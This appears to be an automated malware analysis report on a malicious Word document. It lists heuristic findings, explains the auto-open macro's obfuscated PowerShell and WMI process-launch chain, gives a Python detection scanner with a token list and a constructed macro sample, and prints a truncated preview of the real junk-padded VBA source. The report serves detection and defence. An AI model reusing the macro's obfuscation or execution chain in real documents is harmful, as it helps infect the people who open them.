Verdict: MALICIOUS (risk score 282)

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample is a malicious Word document (OLE) carrying a VBA project. The extracted macro defines an `autoopen` entry point that opens with `On Error Resume Next`, and the heuristics flag a GetObject call and a WMI Win32_Process launcher, the standard macro route for starting a process outside Word. The code is padded with junk: repeated blocks of comparisons between unassigned variables and arithmetic on arbitrary constants that serve no purpose except to bury the one call that matters. In the preview, `autoopen` passes an argument assembled by string concatenation whose visible literal fragments are "po" and "wershel", i.e. a PowerShell command line built at run time so that the word never appears whole in the source; the remaining pieces come from variables not visible in the truncated preview. ClamAV independently flags the file as Doc.Malware.Sagent-6889631-0. Auto-execution plus process creation with a reconstructed PowerShell command is the usual downloader/dropper pattern, although the payload or download location itself cannot be recovered from what is shown. The only URL extracted from the document is the DrawingML schema namespace, which is boilerplate in Office files and not a download location.
Heuristics (8 findings)

- ClamAV: Doc.Malware.Sagent-6889631-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6889631-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
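The WMI launcher and p-code findings above both rest on the same idea: the macro splits "powershell", "winmgmts:" and "Win32_Process" into string fragments joined with `+`, so a scanner has to reassemble the concatenation chains before matching tokens. The script below is an added example of that reassembly, written for this report; it is not the analyzer's own rule code and not oletools. It makes two assumptions, both marked in the code: an identifier used in a chain but never assigned a literal contributes an empty string (which is how the junk variable names in the preview behave), and a run of six or more consecutive characters of a token counts as a partial match, so that a fragment like "powershel" is still reported when the last piece lives in a variable the scanner cannot resolve. The sample macro embedded in it is constructed, modelled on the style of the extracted source.

```python
import re

# Tokens whose presence in a reassembled string points at the execution chain the
# report describes: a PowerShell launch, a WMI moniker for Win32_Process, a download.
TOKENS = ("powershell", "winmgmts:", "win32_process", "wscript.shell",
          "downloadfile", "http://", ".create")
MIN_RUN = 6  # assumption: >= 6 consecutive chars of a token is reported as a partial match

AUTOEXEC = re.compile(r"\b(autoopen|auto_open|document_open|autoexec|workbook_open)\b", re.I)
CONST = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')            # name = "literal"
CHAIN = re.compile(r'((?:"[^"]*"|\w+)(?:\s*\+\s*(?:"[^"]*"|\w+))+)')  # a + b + "c" ...

# Constructed sample in the style of the extracted macro (not the real sample text).
SAMPLE_VBA = """Sub autoopen()
On Error Resume Next
IQAACUX (FxZAUQc + "po" + mAXBBABQ + "wershel" + RUoAoBU + lABGAA)
End Sub
Function SAXUGAA()
zAwA_Q = "win32_"
Set o = GetObject("winmg" + "mts:" + zAwA_Q + "proc" + "ess")
o.Create "cmd /c whoami", Null, Null, pid
End Function
"""


def longest_common_run(a, b):
    """Length of the longest substring shared by a and b (quadratic, fine for one line)."""
    best = 0
    for i in range(len(a)):
        for j in range(len(b)):
            k = 0
            while i + k < len(a) and j + k < len(b) and a[i + k] == b[j + k]:
                k += 1
            best = max(best, k)
    return best


def collect_constants(source):
    """First pass: remember every plain 'name = "literal"' assignment in the module."""
    consts = {}
    for line in source.splitlines():
        m = CONST.match(line)
        if m:
            consts[m.group(1)] = m.group(2)
    return consts


def resolve_chain(chain, consts):
    """Evaluate a '+'-joined chain: literals give their text, identifiers give their
    recorded constant, and anything unresolved gives '' (assumption, see lead-in)."""
    parts = []
    for operand in re.split(r"\s*\+\s*", chain):
        if operand.startswith('"'):
            parts.append(operand[1:-1])
        else:
            parts.append(consts.get(operand, ""))
    return "".join(parts)


def scan_macro(source):
    """Second pass: (line, kind, detail) findings for auto-exec markers and tokens."""
    consts = collect_constants(source)
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = AUTOEXEC.search(line)
        if m:
            findings.append((lineno, "AUTOEXEC", m.group(1).lower()))
        # Rebuild every concatenation chain on the line, then match against the rebuilt
        # text and the raw line together so tokens that were never split are also caught.
        rebuilt = " ".join(resolve_chain(c, consts) for c in CHAIN.findall(line)).lower()
        haystack = rebuilt + " " + line.lower()
        for tok in TOKENS:
            if tok in haystack:
                findings.append((lineno, "TOKEN", tok))
            elif len(tok) > MIN_RUN and longest_common_run(rebuilt, tok) >= MIN_RUN:
                findings.append((lineno, "PARTIAL", tok))
    return findings


def verdict(findings):
    """Mirror the report's reasoning: auto-exec marker plus execution/download tokens."""
    kinds = {k for _, k, _ in findings}
    if "AUTOEXEC" in kinds and kinds & {"TOKEN", "PARTIAL"}:
        return "auto-exec macro with execution/download tokens"
    if "AUTOEXEC" in kinds:
        return "auto-exec macro, no execution tokens"
    return "no auto-exec marker"


if __name__ == "__main__":
    results = scan_macro(SAMPLE_VBA)
    for lineno, kind, detail in results:
        print(f"line {lineno:3d}  {kind:8s}  {detail}")
    print(verdict(results))
```

Run against the constructed sample, line 3 yields a PARTIAL match for "powershell" (the chain rebuilds to "powershel"), line 7 yields "winmgmts:" and "win32_process" because the `zAwA_Q` constant was resolved, and line 8 yields ".create". Feed it the decoded `macros.bas` from the artifact table to see which chains resolve and which still depend on variables assigned outside the visible source.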
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58841 bytes | 4cc15da5afa47aac642d3a6d3fd13c78ea7de7da1edb01fa428451b3de3f6549 |
Preview script: first 1,000 lines of the extracted script (truncated here)

```vba
Attribute VB_Name = "C_AQAZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KB1CAxBD()
Set kAUBX_AB = JGABAUAk
If tZXXw4 = iAADAD Then
wA4oADx = Hex(435593486 - CDate(OZAAAG) * BwDZA4C4 * 889358871)
pBQUZQk = CDbl(YQ_AUAAc)
vGckDC_ = CStr(412085146 * 288942655)
C_ADcwQA = Round(GXAwZA - Hex(IACUAC))
End If
Set wAUUDDo = OUUkAA
If GD_QU4o1 = OcwBUQZG Then
A1UQA_A = Cos(833476017 - CDbl(p_UAXUD) * WBUAw4A * 11270406)
I4c4AABD = Hex(vXAQZDA)
ixAUkAA4 = Fix(387179353 * 501258138)
YcABAA = Int(kDAAAAwQ - Hex(HQBAQGA))
End If
Set zwU_Qok = WkA1AA
If KkBAAAB = QCAA_UU Then
TAACAACx = CDate(461176580 - Tan(iBUGDAA) * qABUAB * 178652828)
wU4AQQ = Chr(NBAUA4AA)
bUGAABQA = CDbl(214868548 * 597967239)
lBAA_AcB = ChrB(PkQ_AAGB - Log(IAAQ4AAQ))
End If
Set YBAAwQAc = MwAA1A
If nZAC_GCD = vAAGXAoB Then
XAAAADD = Atn(377095714 - ChrW(RUxAZ1w) * FDoUAD * 946891097)
BkAAU1Z = Hex(U4D4BAAQ)
IXABDA = CInt(657236021 * 76238042)
TXDAQDA = Sin(zAAA4BA - Log(pQcAQUA))
End If
Set VGABAw1 = w4wAAk
If vACBCXA = sCAAAAX Then
toDBDQAc = Fix(500421440 - Chr(jABAUA) * Z_ZxAx * 381413997)
KAAxADw = CDbl(TAUQCGAA)
FkD4Qk = CInt(774807129 * 526287819)
FQUwAQ_A = Tan(UAZACGG - Log(q1xAAw1))
End If
Set OCA4AAAB = aCcAoGA
If txDQwUU = a4UAkAD Then
i4UBAAA = Sgn(661201866 - Fix(Ux1A1UA) * IUowAUDc * 203026507)
cUBA4AX1 = Int(lBXk_Q)
GACAAkGQ = Sin(401646281 * 358878522)
EB_GAx = Sin(ICwBX4AA - CLng(dokkDA))
End If
Set jAA4AkoA = ECDXADB
If YA1UZA = hcACwX4D Then
CkAAUkGU = CStr(958014342 - Rnd(LABG4GAD) * cUwAAA * 459857187)
lBxAQAUA = CInt(BAD_wA)
P4QAxc = CBool(629658318 * 492720860)
vGcwBX = CInt(KxQDADAX - ChrW(YAxAXcA))
End If
End Function
Sub autoopen()
On Error Resume Next
Set mwcGcAx = RCA4AAwA
If YBCBDD = oAQ4XoAB Then
PBDZGB = Rnd(54506022 - CLng(uBUDAD) * uAAAAk * 338295885)
AAAABAA = Log(YUcADQB)
HDA4AUAB = Log(759282017 * 992358767)
YxAABAxQ = CBool(ODGoDAc - Round(BAAXAA))
End If
Set tZXQAGwQ = kQxUAAD
If iCQwQGAc = LACwAA Then
WUCGcA = Round(646401813 - CDbl(VcCAQX) * pDAABwU * 635741295)
BA1kAAD = Int(qccA4ZB)
jA_AAUDU = Cos(724087477 * 408180537)
MA_c41A = CDate(LCBUDQ - Round(jAAAUxAc))
End If
Set w1cBUAAU = fDoQAQ
If zQAkADo = bUABAZXA Then
uBAQAC1w = CBool(119407176 - Oct(fAD1AcA) * wGUQwAU * 452636348)
lQ4DU_U = ChrB(K_BQAkAA)
AQAC1A = Tan(199467653 * 161129995)
iwA_QG = Atn(zUADcx - CLng(EAUA1x))
End If
IQAACUX (FxZAUQc + "po" + mAXBBABQ + "wershel" + RUoAoBU + lABGAA + GoDBw4A_ + qGA1AA + EA1cAAwA + GBDDBBkA + vDAUkXB + S4CkQA_)
Set wUAAooA = FAAcAABc
If iQAwDBU = PoAoUBUA Then
UAADGAUX = Log(328917218 - CBool(DQA4XCA) * w_x_DA1 * 450893849)
wwQkAD = Log(EXUAD_A)
C1XoQBA = Round(923099826 * 943318027)
AAAAUA_ = CStr(WUZAZD - Sqr(PDQwBBAA))
End If
Set qZQU1k = TAZAAk
If zBBQAC = d4DxD_ Then
BABAAA = CLng(916399824 - Fix(sxow4UA) * PAQDDoZZ * 131820551)
vcAAAo = CInt(iDxA_A)
GACA_ADA = Rnd(777832598 * 549218008)
zBQQwD_o = Sqr(DUQDXAA - Round(LZCD_A))
End If
Set HAAGAAo = jAQ4UoD
If NAc4A4Z = uAADQ_A Then
vcD4AU = Oct(444684393 - ChrW(aAAAkAA) * TQQAAU * 538050094)
hAXABG = Int(ABG4BA)
zAAA1o = Oct(456389661 * 261817144)
aZ_BUAB = Int(VAXQD_co - Sqr(aAUAwAQ))
End If
End Sub
Function SAXUGAA()
Set zAwA_Q = GxkUAZCA
If D4BADA = X_UADD Then
zAoUAUDA = Int(770542664 - Sin(
... (truncated)
```